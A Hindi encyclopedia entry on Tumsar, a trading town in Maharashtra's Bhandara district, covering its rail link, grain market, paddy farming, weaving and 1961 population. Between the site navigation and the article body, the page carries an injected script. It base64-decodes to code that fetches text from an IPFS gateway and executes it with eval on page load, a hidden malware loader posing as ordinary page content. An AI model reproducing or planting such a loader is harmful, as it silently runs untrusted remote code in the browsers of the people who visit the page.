तमसर

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

तमसर महाराष्ट्र राज्य के भंडारा जिले एवं तहसील में, कलकत्ता-नागपुर रेल मार्ग पर, भंडारा से २७ मील एवं बंबई से ५७० मील की दूरी पर स्थित नगर है। १८६७ ई० में यहाँ पर नगरपालिका बनी थी। यह एक व्यापारिक नगर है, जहाँ पर उत्तरी जिले एवं सिवनी और बालाघाट क्षेत्र से कृषि उत्पाद आते हैं। यहाँ पर सप्ताह में अनाज का बड़ा बाजार लगता है। तमसर के आसपास का क्षेत्र धान की अधिक पैदावार के कारण प्रसिद्ध है। कपड़े की बुनाई का उद्योग सबसे प्रमुख है। लाल किनारीवाले गमछे यहाँ अधिक बनते हैं। बैलगाड़ियों के पहिए नागपुर आदि नगरों को भेजे जाते हैं। यहाँ कई स्कूल एवं अस्पताल भी है। यहाँ की जनसंख्या २४,९१० (१९६१) थी

टीका टिप्पणी और संदर्भ